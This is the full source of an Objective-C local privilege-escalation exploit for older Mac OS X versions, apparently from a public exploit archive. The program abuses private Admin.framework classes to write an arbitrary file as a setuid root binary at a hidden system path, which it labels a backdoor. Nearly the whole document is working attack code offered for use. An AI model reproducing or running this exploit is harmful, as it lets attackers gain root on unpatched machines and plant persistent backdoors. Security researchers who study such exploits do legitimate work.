Apple MAC OS X < 10.9/10 - Local Root Exploit

                                                #include <stdio.h>
#include <stdlib.h>
 
#import <SecurityFoundation/SFAuthorization.h>
#import <Foundation/Foundation.h>
 
/* where you want to write it! */
#define BACKDOOR_BIN  "/var/db/.AccessibilityAPIEnabled"
 
int do_assistive_copy(const char *spath, const char *dpath)
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  id authenticatorInstance, *userUtilsInstance;
  Class authenticatorClass, userUtilsClass;
 
  (void) pool;
  NSBundle *adminBundle =
    [NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/Admin.framework"];
 
  authenticatorClass = [adminBundle classNamed:@"Authenticator"];
  if (!authenticatorClass)
    {
      fprintf (stderr, "* failed locating the Authenticator Class\n");
      return (EXIT_FAILURE);
    }
 
  printf ("* Found Authenticator Class!\n");
  authenticatorInstance =
    [authenticatorClass performSelector:@selector(sharedAuthenticator)];
 
  userUtilsClass = [adminBundle classNamed:@"UserUtilities"];
  if (!userUtilsClass)
    {
      fprintf (stderr, "* failed locating the UserUtilities Class\n");
      return (EXIT_FAILURE);
    }
 
  printf ("* found UserUtilities Class!\n");
  userUtilsInstance = (id *) [userUtilsClass alloc];
 
  SFAuthorization *authObj = [SFAuthorization authorization];
  OSStatus isAuthed = (OSStatus)
    [authenticatorInstance performSelector:@selector(authenticateUsingAuthorizationSync:)
                                withObject:authObj];
  printf ("* authenticateUsingAuthorizationSync:authObj returned: %i\n", isAuthed);
 
  NSData *suidBin =
    [NSData dataWithContentsOfFile:[NSString stringWithCString:spath
                                             encoding:NSASCIIStringEncoding]];
  if (!suidBin)
    {
      fprintf (stderr, "* could not create [NSDATA] suidBin!\n");
      return (EXIT_FAILURE);
    }
 
  NSDictionary *createFileWithContentsDict =
    [NSDictionary dictionaryWithObject:(id)[NSNumber numberWithShort:2377]
                                forKey:(id)NSFilePosixPermissions];
  if (!createFileWithContentsDict)
    {
      fprintf (stderr, "* could not create [NSDictionary] createFileWithContentsDict!\n");
      return (EXIT_FAILURE);
    }
 
  CFStringRef writePath =
    CFStringCreateWithCString(NULL, dpath, kCFStringEncodingMacRoman);
#pragma clang diagnostic push
#pragma clang diagnostic ignored "-Wobjc-method-access"
  [*userUtilsInstance createFileWithContents:suidBin path:writePath
                                  attributes:createFileWithContentsDict];
#pragma clang diagnostic pop
  printf ("* now execute suid backdoor at %s\n", dpath);
 
  /* send the "Distributed Object Message" to the defaultCenter,
   * is this really necessary? (not for ownage)
   */
  [[NSDistributedNotificationCenter defaultCenter]
    postNotificationName:@"com.apple.accessibility.api"
    object:@"system.preferences" userInfo:nil
    deliverImmediately:YES];
 
  return (EXIT_SUCCESS);
}
 
int main (int argc, const char * argv[])
{
 
  printf ("Apple MACOS X < 10.9/10? local root exploit\n"
          "by: <[email protected]>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2010!@$!\n\n");
 
  if (argc <= 1)
    {
      fprintf (stderr, "Usage: %s <source> [destination]\n", argv[0]);
      exit (EXIT_SUCCESS);
    }
 
  return (do_assistive_copy(argv[1], argc >= 2 ? argv[2] : BACKDOOR_BIN));
}